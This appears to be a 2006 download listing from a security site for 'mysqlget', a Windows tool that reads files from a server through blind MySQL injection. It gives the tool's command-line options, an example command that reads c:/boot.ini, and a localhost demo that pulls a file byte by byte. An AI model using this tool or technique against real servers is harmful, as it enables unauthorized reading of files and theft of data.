mysqlget.zip

Submitted: 2006-07-25
Updated: 2006-07-28
Submitted by: cooldiyer
Category: Scanner
Platform: Windows
Size: 16155 Bytes
File MD5: d6b5be655349e5c2d55d032b4dcc1a7f
Source: cooldiyer

ROOT: XFOCUS has not tested or checked this tool in any way; use it at your own risk.

A download tool, with source code, for cases where the server does not support UNION queries. The program description follows.

mysqlget for mysql injection Version 1.0.0
xdiyer at gmail.com
http://xdiyer.uni.cc
---------------------------------------------------
Usage: mysqlget <options> <Thread>
Options:
  -t   Target injection URL include %s to replace.   # URL of the injection point; "%s" marks where the code is inserted
  -f   Remote file to load Must be absolute path.    # absolute path of the remote file
  -s   Local file to saved.                          # local path to save to
  -Mr  Match code case response right.               # content matched when the response is correct (choose one of the two cases)
  -Me  Match code case response error.               # content matched when the response is an error
Example:
  mysqlget -t http://localhost/index.php?id=1%s -f c:/boot.ini -s E:/data.txt -Mr test 8

The following is an example that downloads D:/data.txt (content: "I am cooldiyer \r\n") to the local file E:/data.txt using 5 threads.

C:\>mysqlget -t http://localhost/index.php?id=1%s -f d:/data.txt -s E:/data.txt -Mr test 5
---------------------------------------------------
Target > http://localhost/index.php?id=1%s
FileLD > d:/data.txt
FileSF > E:/data.txt
RiCode > test
ErCode >
Thread > 5
Length > 102400 bytes
ARange > 0 - 255
---------------------------------------------------
[+] Waiting for get file length ...
[+] File length 17 byte(s)
[+] Keep 5 threads get data
[Offset 06/17] : 99 [c]
[Offset 04/17] : 109 [m]
[Offset 01/17] : 73 [I]
[Offset 03/17] : 97 [a]
[Offset 02/17] : 32 [ ]
[Offset 05/17] : 32 [ ]
[Offset 07/17] : 111 [o]
[Offset 08/17] : 111 [o]
[Offset 11/17] : 105 [i]
[Offset 10/17] : 100 [d]
[Offset 09/17] : 108 [l]
[Offset 12/17] : 121 [y]
[Offset 13/17] : 101 [e]
[Offset 14/17] : 114 [r]
[Offset 15/17] : 32 [ ]
]Offset 16/17] : 13 [
[Offset 17/17] : 10 [ ]
[+] Threads return using 6s
[+] Save file to E:/data.txt ...
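---------------------------------------------------
# File content follows
I am cooldiyer
---------------------------------------------------

Tested on my own machine (256 MB memory + Win2000): downloading mysqlget.exe (7680 bytes) with 8 threads took 980 seconds.

The thread count cannot exceed 5000, the maximum file size is defined as 102400 bytes, and the ASCII code range is 1-255, which includes Chinese characters. The program is written in VC++, with the binary search method wrapped in a class. My ability is limited; please point out any bugs I am not aware of.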